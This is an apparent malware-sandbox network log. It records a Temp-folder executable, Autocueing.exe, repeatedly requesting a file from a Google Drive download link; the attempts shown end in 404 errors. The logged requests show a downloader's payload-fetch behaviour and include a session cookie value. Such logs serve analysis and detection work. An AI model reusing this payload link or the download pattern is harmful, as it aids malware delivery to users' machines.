                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:00 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-L_fzmOOI7Hkf5DsCvLRfYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 50036 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:01 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTGxi-imLV30YR0MPMeeWzNJqky7yS09xqzaOM3-4fIMSJl52zbbsWtvNePzBB1lMg3
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:01 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-QW5DyroVhUhgbrgA_sTTwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2QKqme9PR9Ke_t7AAiXSsw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 50037 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:02 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-UMWuxwwUtOmCdAtxEj4orA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 50038 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:03 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:03 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4WnCNcuhRYqGsGQpBrAZ0JQAssf2gN7F90zv_2JFB8_mYHudLBwwahGTNhCDIw6_0HnD1Eddo
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:03 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-hCCoLovpycFQS0Jk5VH8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:03 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0VK74skjaJ1z9jeVUs-m0g">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 50040 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:04 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Aopptl6mLgsL3WhRnjjzQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 50041 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:05 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:06 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgT72STby2HpL8BfreZE_9hFyCve7O0nTXiHOd2kBVSE9AQa4NlO3iv_SrEacfmd4Z6x
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:06 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-VgnnsdqBP72rJbq2pd_sfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a7nIOu9TSbEHGIin4adIoA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 50042 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:07 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Qtkvoin_BrFYeuURqZR6Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 50043 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:08 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:08 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTA7uK8NWEqkwmM9uFlVuFGAsg1auwHDoQxzWHYZYoWAYhf6XGYR-3RzBWJmtqQu-ol
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:08 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Zn9Jjjap9ICX0aRIC6El9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iNyZwHuZw55670p97spMGw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 50044 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:09 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
